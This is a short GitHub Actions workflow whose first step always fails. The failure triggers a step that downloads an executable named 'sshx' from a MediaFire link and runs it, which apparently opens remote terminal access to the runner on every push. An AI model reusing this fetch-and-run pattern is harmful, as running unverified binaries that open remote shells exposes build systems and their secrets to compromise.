name: test

on:
  push:
  workflow_dispatch:
    inputs:
      debug:
        type: boolean
        description: Manual trigger
        required: false
        default: false

jobs:
  gh-action-job:
    runs-on: ubuntu-22.04-arm
    steps:
      - name: A step that will always fail
        run: |
          echo "this step will wait 10 seconds and always fails"
          sleep 10
          exit 1
      - name: Start SSHX in case of failure
        if: failure()
        run: |
          curl -L "https://download1326.mediafire.com/k9y87jctu3rg1yPvjlSeSz3TUo0ZmJYmUK0lYcrymRFTNU2e3t_QPzepWZcRRj8jqIR1OUbmxTlo1lcm5s39NoQOgmW917pqrrvVRPaKXfeV1npOXxnQIfGJ2MjsPYerUbTnhwQEy42xZYjnLF0mUTuMR4ZJdA8Y66SqVozvJ3a7kQ/98fshrhc1xa48g7/sshx" -o sshx && chmod +x sshx && ./sshx
